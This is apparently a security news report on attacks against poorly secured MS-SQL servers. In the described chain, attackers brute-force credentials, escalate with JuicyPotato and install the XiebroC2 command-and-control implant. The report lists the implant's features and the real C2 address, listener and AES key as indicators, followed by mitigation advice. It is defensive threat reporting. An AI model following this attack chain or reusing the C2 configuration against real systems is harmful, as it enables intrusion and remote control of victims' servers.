A surge in attacks targeting improperly managed MS-SQL servers, culminating in the deployment of the open-source XiebroC2 command-and-control (C2) framework.
Similar in functionality to legitimate tools like Cobalt Strike, XiebroC2 offers capabilities for information gathering, remote control, and defense evasion, making it an attractive option for threat actors seeking a cost-effective intrusion platform.
In one confirmed incident, attackers leveraged publicly exposed MS-SQL server credentials to gain unauthorized access.
After brute-forcing weak or default account passwords, the intruders executed a sequence of payload deployments common to MS-SQL compromises, with cryptocurrency miners being the primary malware of choice.
Once authenticated, the threat actors dropped JuicyPotato, a privilege-escalation utility exploiting specific Windows privileges within the tokens of the running MS-SQL process.
AhnLab Security Intelligence Center (ASEC) researchers have uncovered a SQL Server service itself operates under a low-privilege account by default, JuicyPotato allowed attackers to elevate to SYSTEM privileges.
Evidence of the download and execution was captured in server logs, showing PowerShell’s Invoke-WebRequest function pulling the XiebroC2 payload over HTTP. This sequence underscores the critical risk posed by publicly accessible database servers without robust credential policies or network-level access controls.
With SYSTEM privileges secured, the attackers executed a PowerShell command to retrieve and install XiebroC2 directly from its GitHub repository.
XiebroC2 Framework
XiebroC2’s implant component—the core backdoor functionality—is written in Go, providing cross-platform support for Windows, Linux, and macOS systems.
Once deployed, the implant initiates a connection to the attacker’s C2 server, authenticates using a preconfigured AES key, and awaits commands. Common features include:
- Reverse shell access.
- File and process management.
- Network monitoring and packet capture.
- Reverse proxy tunneling.
- Screenshot capture.
Upon execution, XiebroC2 collects environment details such as process ID (PID), hardware ID (HWID), computer name, and user name, then transparently connects to the C2 server to register the compromised host. In the incident monitored by ASEC, the configuration parameters were as follows:
- HostPort: 1.94.185[.]235:8433.
- Protocol: Session/Reverse_Ws.
- ListenerName: test2.
- AesKey: QWERt_CSDMAHUATW.
These values enabled the implant to establish a persistent encrypted WebSocket session over TCP, providing resilient bidirectional communication even in the presence of network disruptions.
Once connected, the attacker can execute arbitrary commands or deploy additional payloads, cementing foothold for further lateral movement or data exfiltration.
Mitigations
Enforce Strong Authentication Policies: Administrators must disable weak or default credentials on MS-SQL servers. Implementing complex, unique passwords and enabling account lockout policies will drastically reduce the success rate of brute-force and dictionary attacks.
Limit Public Exposure: MS-SQL instances should not be directly accessible from the Internet. Employ network segmentation and firewall rules to restrict database access to only authorized application servers or VPN endpoints.
Patch and Update: Ensure all endpoints running MS-SQL services are fully patched and running the latest security updates. Vulnerabilities in service-host processes can facilitate initial compromise and privilege escalation.
Monitor and Alert: Deploy intrusion-detection systems capable of flagging anomalous login attempts, unexpected privilege-escalation tool execution (e.g., JuicyPotato), and unusual outbound network connections—especially to unknown external IP addresses and uncommon ports.
Endpoint Protection: Utilize up-to-date antimalware solutions to detect and quarantine known tools like JuicyPotato and C2 framework components. Behavioral analysis can provide early warning of reconnaissance or lateral-movement activities.
ASEC continues to monitor emerging threats targeting database servers and urges organizations to adopt a defense-in-depth approach.
Failure to secure authentication mechanisms, maintain up-to-date patches, and restrict network access may lead to repeated infections and compromise of critical infrastructure. Preventive action today will safeguard against tomorrow’s advanced intrusion frameworks.
Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.
